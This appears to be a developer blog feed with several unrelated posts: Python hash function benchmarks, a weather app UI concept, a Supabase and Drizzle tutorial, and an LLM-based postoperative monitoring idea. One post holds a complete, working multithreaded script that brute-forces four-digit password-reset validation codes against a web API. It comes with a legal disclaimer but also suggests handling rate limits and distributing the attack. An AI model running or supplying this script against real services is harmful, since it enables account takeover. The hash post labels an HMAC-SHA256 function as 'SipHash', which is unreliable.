DEV Community: Mihai

Exploring Hash Functions in Python: Distribution, Collisions, and Performance

Mihai — Sun, 20 Oct 2024 14:31:40 +0000

This script demonstrates different hash functions and tests how they distribute elements in a hash table. It includes functions for measuring distribution, collisions, execution time, and sensitivity to minor changes.

Simple Hash Function (simple_hash):

This hash function sums the ASCII values of each character in the input string and then takes the result modulo the table size. It's a basic form of hashing and can lead to poor distribution.

def simple_hash(input_str, table_size):
    hash_value = 0
    for char in input_str:
        hash_value += ord(char)
    return hash_value % table_size

Polynomial Hash (polynomial_hash):

Uses a polynomial accumulation of ASCII values, with a prime number (default is 31) to give more weight to characters earlier in the string.

def polynomial_hash(input_str, table_size, prime=31):
    hash_value = 0
    for i, char in enumerate(input_str):
        hash_value += ord(char) * (prime ** i)
    return hash_value % table_size

FNV-1a Hash (fnv1a_hash):

A 32-bit version of the FNV-1a hash, which multiplies and XORs the input characters using constants to generate a hash value. It's commonly used for its good distribution characteristics.

def fnv1a_hash(key, table_size):
    FNV_prime = 16777619
    FNV_offset_basis = 2166136261
    hash_value = FNV_offset_basis
    for char in key:
        hash_value ^= ord(char)
        hash_value *= FNV_prime
        hash_value &= 0xffffffff  # Ensure 32-bit hash
    return hash_value % table_size

XXHash (xx_hash):

Utilizes the xxhash library to compute a fast, non-cryptographic hash. It’s very efficient for large datasets.

def xx_hash(input_str, table_size):
    return xxhash.xxh32(input_str).intdigest() % table_size

SipHash (sip_hash):

Uses the hmac library to wrap the input string with a secret key and apply the sha256 hash function. This can provide security, though it's slower than non-cryptographic hashes.

def sip_hash(input_str, table_size, key=b'secretkey'):
    hash_value = hmac.new(key, input_str.encode(), digestmod='sha256').hexdigest()
    return int(hash_value, 16) % table_size

MurmurHash (murmur_hash):

A fast, non-cryptographic hash function using the mmh3 library. It's widely used in hash tables and bloom filters.

def murmur_hash(input_str, table_size):
    hash_value = mmh3.hash(input_str) % table_size
    return hash_value

Generating Random Strings (`generate_random_strings`):

This function generates a list of random alphanumeric strings of a specified length. It's used for testing the hash functions.

def generate_random_strings(n, length=12):
    random_strings = []
    for _ in range(n):
        random_str = ''.join(random.choices(string.ascii_letters + string.digits, k=length))
        random_strings.append(random_str)
    return random_strings

Printing the Distribution (`pretty_print_distribution`):

Displays how many elements are present in each location of the hash table, giving insight into the distribution and potential collisions.

def pretty_print_distribution(distribution):
    print("Element distribution in the table:")
    for num_elements, count in sorted(distribution.items()):
        print(f"  Locations with {num_elements} element(s): {count}")

Testing Distribution and Collisions `(test_distribution_and_collisions)`:

This function evaluates how well a hash function distributes a set of elements across the hash table. It checks for collisions and calculates the final distribution.

def test_distribution_and_collisions(hash_func, table_size, num_elements):
    hash_table = [0] * table_size
    elements = generate_random_strings(num_elements)
    collisions = 0
    for elem in elements:
        hash_index = hash_func(elem, table_size)
        if hash_table[hash_index] != 0:
            collisions += 1
        hash_table[hash_index] += 1
    distribution = collections.Counter(hash_table)
    print(f"Total number of collisions: {collisions}")
    pretty_print_distribution(distribution)

Testing Execution Time (`test_execution_time`):

Measures the time it takes to apply a hash function to a set of elements, helping compare performance between different hash functions.

def test_execution_time(hash_func, table_size, num_elements):
    elements = generate_random_strings(num_elements)
    start_time = time.time()
    for elem in elements:
        hash_func(elem, table_size)
    end_time = time.time()
    execution_time = end_time - start_time
    print(f"Total execution time for {num_elements} elements: {execution_time:.6f} seconds")

Testing Sensitivity to Minor Changes (`test_sensitivity`):

This function checks whether the hash function is sensitive to small changes in input. It compares the hash values of two very similar strings.

def test_sensitivity(hash_func, table_size):
    original_str = "example"
    modified_str = "exampLe"  # Changing a single character
    original_hash = hash_func(original_str, table_size)
    modified_hash = hash_func(modified_str, table_size)
    print(f"Original hash for '{original_str}': {original_hash}")
    print(f"Modified hash for '{modified_str}': {modified_hash}")
    if original_hash != modified_hash:
        print("The hash function is sensitive to small changes.")
    else:
        print("The hash function is NOT sensitive to small changes.")

Understanding a Multithreaded Brute-Force Password Attack in Python

Mihai — Sun, 20 Oct 2024 14:19:15 +0000

This article explains a Python script designed to perform a brute-force password attack using multithreading. The code automates the process of attempting numerous password combinations on a web service until the correct password is discovered. Let’s break down the key components, the purpose of the code, and the ethical implications of using such methods.

Purpose of the Code
The primary purpose of this script is to brute-force the password reset validation code by trying every possible numeric password within a specified range. The goal is to exploit an API endpoint to reset a password by guessing the correct four-digit validation code. Brute-forcing involves systematically attempting every combination until the correct one is found.

This code utilizes multithreading to increase the speed of password attempts by sending multiple requests concurrently.

Key Components
Libraries Used:

requests: Used to send HTTP requests to the target server.
itertools.product: Generates combinations (though not used in the final version, but useful for larger brute-force strategies). string: Provides string constants (again, useful for generating alphabetic passwords).
time : Adds delays between requests to avoid overwhelming the server.
concurrent.futures.ThreadPoolExecutor: Allows multiple threads to run concurrently, improving brute-forcing efficiency.

Password Generation: The script focuses on generating four-digit numeric passwords, ranging from 0000 to 9999. This approach can be easily expanded for more complex password sets, such as alphanumeric combinations.

Password Guessing Strategy: The function generate_wrapped_passwords is structured to prioritize certain ranges of passwords. It starts from 5000-9999, followed by 0000-4999. This approach might be helpful if some passwords are more likely to fall in a specific range.

Ethical and Legal Considerations

It's important to understand that brute-force attacks are illegal and unethical unless you have explicit permission to test the security of a system, such as in the context of a penetration test or bug bounty program. Attempting to brute-force passwords without authorization can lead to severe legal consequences, including criminal charges.

The script provided here should be used only in ethical hacking environments where you have permission to test the system’s security, such as during security audits or testing your own applications.

Improvements and Modifications

While the current script is functional, several improvements can be made:

Larger Password Spaces:

If the password is alphanumeric or longer than four digits, the script could be modified to include letters and symbols. The itertools.product() function could be useful here for generating a larger set of password combinations.

Rate Limiting Detection:

Servers often implement rate-limiting to detect brute-force attempts. It would be beneficial to include rate-limit handling, such as detecting the HTTP response status code (e.g., 429 for "Too Many Requests") and adjusting the frequency of requests.

Better Error Handling:

The script could be improved with more robust error handling. If the server returns unexpected responses or if network errors occur, the script could pause or retry after some time instead of failing silently.

Distributed Brute-Force:

For very large password spaces, the brute-force could be distributed across multiple machines or servers to speed up the process further.

import requests
from itertools import product
import string
import time
from concurrent.futures import ThreadPoolExecutor

# Define the target URL
url = "<url>"  # Change this to your URL

# Define character set to brute force passwords (numeric in this case)
password_length = 4  # For a 4-digit numeric password like "0001", "0002", ...

# Function to send request with the generated password
def send_request(password):
    # Payload to send in request
    data = {
        "validationCode": str(password)
    }

    # Send the POST request to the authorization layer
    try:
        response = requests.patch(url, data=data)

        # Check response
        if response.status_code == 200:
            print(f"Success! Password found: {password}")
            return True
        else:
            print(f"Failed attempt with password: {password}")

        # Delay to avoid overwhelming the server or being rate-limited
        time.sleep(0.1)

    except requests.exceptions.RequestException as e:
        print(f"Error occurred: {e}")

    return False

# Generate numeric passwords (from 0000 to 9999 for length 4)
def generate_wrapped_passwords(length):
    # First phase: from 5000 to 9999
    for number in range(5000, 10**length):
        yield str(number).zfill(length)

    # Second phase: from 0000 to 4999
    for number in range(0, 5000):
        yield str(number).zfill(length)


# Multithreaded brute-force attempt
def multithread_brute_force(password_length, max_threads=10):
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        # Generate all passwords and submit them to the thread pool for execution
        passwords = generate_wrapped_passwords(password_length)
        futures = [executor.submit(send_request, password) for password in passwords]

        # Check the results as they complete
        for future in futures:
            if future.result():
                # Stop further attempts once a password is found
                executor.shutdown(wait=False)
                break

# Run the brute force attack using multithreading
if __name__ == "__main__":
    multithread_brute_force(password_length, max_threads=20)  # Adjust max_threads for concurrency

This script illustrates a brute-force attack designed to guess a validation code by trying every possible numeric combination. The use of multithreading greatly increases the efficiency of the attack by allowing many attempts to happen simultaneously. However, the ethical and legal implications of such a technique cannot be overstated — unauthorized brute-force attacks are illegal. Always ensure you have proper permissions before testing the security of any system.

Weather Application UI Concept

Mihai — Sun, 20 Oct 2024 13:50:16 +0000

The first thing you’ll see when you open this weather app is a beautifully clean main screen showing today’s weather with all the important details front and center. It’s like a weather snapshot: temperature, location, and an easy-to-understand weather icon (sun, rain, snow—you get it). The style? Modern, minimal, and super user-friendly.

The Header: Where Am I, and What Time Is It?

At the top, you’ll find your city and country displayed proudly. Not where you are? No worries, there's a cute little search icon for quick location changes. Right under that, the current date and time keep you on track.

Weather Icon & Temperature: Big and Bold

The weather icon is front and center—big, bright, and dynamic. Whether it’s sunny or stormy, you’ll see it clearly. Next to it is the temperature, in large, bold numbers, so you can’t miss it. Fahrenheit or Celsius? Your choice.

Underneath, a little text gives you the vibe of the day: "Sunny," "Cloudy," or whatever nature’s got in store.

Extra Weather Goodies

Humidity: Don’t sweat it—humidity is shown as a percentage (e.g., 65%).
Wind Speed: Gentle breeze or windstorm? Check the speed in km/h or mph.
Feels Like: Sometimes 28°C doesn’t feel like 28°C. This handy feature tells you how it really feels out there.

Hourly Forecast: What’s Next?

Need to know what the next few hours look like? No problem! Swipe through sleek, scrollable cards showing the forecast hour by hour.

Each card gives you:

Time: A simple display of the hour (12 PM, 1 PM).
Weather Icon: Tiny icons for a quick glance at conditions.
Temperature: Right below the icon, you’ll see the hourly temps.

Daily Forecast: Plan the Week

Scroll down a bit more, and voila! A 7-day weather outlook awaits. Here’s what you get:

Day Names: Easy-to-read labels like Mon, Tue, Wed.
Icons: Visual weather hints—sun, cloud, rain, or snow.
Max/Min Temps: The hottest and coolest moments of each day.

This weather app UI is all about giving you everything you need—right at your fingertips, with a design that’s as smooth as the forecast you’re checking!

Building a QR-Driven Driver Communication App with Supabase: A Step-by-Step Guide to Clone Sticar - Part 1

Mihai — Fri, 04 Oct 2024 17:25:14 +0000

In this article, you will learn how to build an application with supabase as a firebase alternative in order to build Sticar.

To keep the project simple, we'll develop a web application using NextJS. Additionaly, by leveraging FCM(Firebase Cloud Message) we'll deliver notifications directly to the user without requiring them to install any app.

Requirements :

Create a supabase project

Create a Next.js app

Use the create-next-app command and the with-supabase template, to create a Next.js app pre-configured with:

npx create-next-app -e with-supabase

Declare Supabase Environment Variables

Rename .env.example to .env and populate with your
project's URL and Anon Key.

NEXT_PUBLIC_SUPABASE_URL=your-project-url
NEXT_PUBLIC_SUPABASE_ANON_KEY=your-anon-key
DATABASE_URL=your-database-url-used-by-drizzle-orm

Start the app

Using npm run dev will trigger a script to start the development server.
Authenticate with the mail that you registered on supabase and you should be able to receive an email, confirm the account and sign in !

Creating our first SQL Table

Instead of creating an SQL table with Supabase - SQL Editor, we'll be using Drizzle ORM. It's an easy way to generate and migrate your sql schema.

Drizzle Kit

Drizzle Kit — is a CLI companion for automatic SQL migrations generation and rapid prototyping.

Conceptually it’s very simple, you just declare a Drizzle ORM TypeScript schema and generate an SQL migration from it.

Stop the server and install the module using yarn add -D drizzle-kit

Moreover, we'll need to install drizzle-orm, postgres and dotenv package as well by using yarn add drizzle-orm dotenv postgres.

Create drizzle.config.ts at the root of the project folder. This file will be used by drizzle-kit to generate the migrations based on our schema files.

import { config } from "dotenv";
import { defineConfig } from "drizzle-kit";

config({ path: ".env.local" });

export default defineConfig({
  schema: "./utils/drizzle/schema.ts",
  out: "./supabase/migrations",
  dialect: "postgresql",
  dbCredentials: {
    url: process.env.DATABASE_URL!,
  },
});

Next step is to create under utils folder a new folder called drizzle with a file named schema.ts.

In the schema.ts file we will export the schemas and be consumed by the drizzle-kit.

For this example we will have 3 tables :

QRCodes
- The user will be able to generate an unique QR Code and link it to an asset.
Assets
- The user can define the type of the asset (vehicle, bag, property)
Messages
- We will store the message received from sender and link it to the receiver.

Asset Management The schema includes a table for assets (Assets), which represent physical items like vehicles, properties, or bags that users want to link with QR codes.

Asset Types: The application supports different asset categories such as vehicles, properties, and bags. This is done using an enumeration (enum), ensuring only predefined types can be assigned to an asset.
Assets Table: Each asset has a unique ID (id), belongs to a user (userId), and can be associated with a QR code (qrCodeId). The table also stores a description (assetDescription) of the asset and a creation timestamp (createdAt).
This structure allows the system to track which assets belong to which users, and to link them to QR codes.

QR Codes Management QR codes are crucial for this project as they allow users to scan and interact with the asset owner without intermediaries.

QR Code Table: Each QR code has a unique identifier (id) and is linked to an asset (assetId). The table tracks whether the QR code is currently active (isActive), when it was assigned to the asset (assignedAt), and the time it was last scanned (lastScannedAt).
By managing these QR codes independently, the system can store and update QR codes without deleting them, even if they are no longer in active use. This is essential for printed codes that cannot be easily replaced.
QR Code Status: The QR codes have statuses such as active or inactive, helping to indicate whether the code is currently usable or has been replaced.

User Messaging System The schema also includes a messaging feature, allowing users to communicate directly with the owner of the asset after scanning a QR code.

Messages Table: When a user scans a QR code and sends a message, it’s logged in the Messages table. Each message includes the sender’s user ID (senderUserId), the receiver’s user ID (receiverUserId), the asset it relates to (assetId), and the content of the message (messageContent). The table also records when the message was created (createdAt).

This system facilitates direct communication between the scanning user and the asset owner, which is essential for scenarios like road emergencies or parking situations.

Schema File

import {
  pgTable,
  uuid,
  varchar,
  text,
  timestamp,
  boolean,
  pgEnum,
  serial,
  integer,
} from "drizzle-orm/pg-core";

export enum AssetType {
  VEHICLE = "VEHICLE",
  PROPERTY = "PROPERTY",
  BAG = "BAG",
}

export const assetTypeEnum = pgEnum("asset_type", [
  AssetType.BAG,
  AssetType.PROPERTY,
  AssetType.VEHICLE,
]);

export const Assets = pgTable("asset", {
  id: serial("id").primaryKey(),
  userId: uuid("user_id").notNull(),
  assetType: assetTypeEnum("asset_type").notNull(),
  assetDescription: text("asset_description"),
  qrCodeId: integer("qr_code_id").references(() => QRCodes.id),
  createdAt: timestamp("created_at").defaultNow(),
});

export enum QRStatusType {
  ACTIVE = "ACTIVE",
  INACTIVE = "INACTIVE",
}

export const qrStatusTypeEnum = pgEnum("asset_type", [
  AssetType.BAG,
  AssetType.PROPERTY,
  AssetType.VEHICLE,
]);

export const QRCodes = pgTable("qrcode", {
  id: serial("id").primaryKey(),
  userId: uuid("user_id").notNull(),
  isActive: boolean("is_active"),
  assetId: integer("asset_id").references(() => Assets.id),
  assignedAt: timestamp("assigned_at").defaultNow(),
  createdAt: timestamp("created_at").defaultNow(),
  lastScannedAt: timestamp("last_scanned_at").defaultNow(),
});

export const Messages = pgTable("message", {
  id: serial("id").primaryKey(),
  senderUserId: uuid("sender_user_id"),
  receiverUserId: uuid("receiver_user_id").notNull(),
  assetId: integer("asset_id").references(() => Assets.id),
  messageContent: varchar("message_content", {
    length: 255,
  }),
  createdAt: timestamp("created_at").defaultNow(),
});

Generate the sql migration using :
npx drizzle-kit generate

Make sure you have DATABASE_URL updated inside your environment file and execute npx drizzle-kit migrate.

You can now check Supabase - Table Editor to view the tables created.

Conclusion

In this part of the article, we've explored how to set up the backend for our app using Supabase, focusing on the database structure, asset management, QR code handling, and messaging. With the Supabase setup in place, you now have the foundation to manage user assets, QR codes, and communication between users.

In the next part (Part 2) of this series, we'll dive into the Next.js frontend and build out the user interface. We’ll cover how to connect the backend with the UI, manage real-time updates, and handle QR code scanning and messaging seamlessly.

Stay tuned!

AI Postoperative Monitoring & Recovery Tool - An LLM approach

Mihai — Sat, 07 Sep 2024 07:49:39 +0000

The postoperative phase is critical in which vigilant monitoring and personalized care are paramount to successful recovery. AI-driven postoperative monitoring systems represent a significant leap forward in providing continuous, real-time assessment of patients as they transition from the operating room to recovery. These systems utilize ML algorithms to analyze a plethora of data, including vital signs, pain levels, and recovery metrics. By doing so, AI facilitates early detection of postoperative complications, enabling healthcare providers to intervene promptly. Integrating AI in postoperative monitoring not only enhances the accuracy of complication detection but also contributes to the efficient allocation of healthcare resources.
(Artificial intelligence-assisted system in postoperative follow-up of orthopedic patients: exploratory quantitative and qualitative study. Bian Y, Xiang Y, Tong B, Feng B, Weng X. J Med Internet Res. 2020;22:0)

But what if we don't have access to patient data ?
How can we streamline a process to improve the experience for both the patient and the doctor ?

One solution would be to use a Large Language Model(LLM) trained to understand the patient history and specific type of operation. This LLM should be trained with the help of a doctor.

Instead of having a relationship between the doctor and the patient, we could follow a simplistic approach :

The trained LLM knows how to structure the questions to retrieve sentiment data. The sentiment data is sent to a tracking sentiment service.
Patient Score : The score would indicate whether they are at risk or in a healthy condition, offering valuable insights for both patient and doctors.
The doctor can access the patient score within the server, ask personalized and streamline their workflow.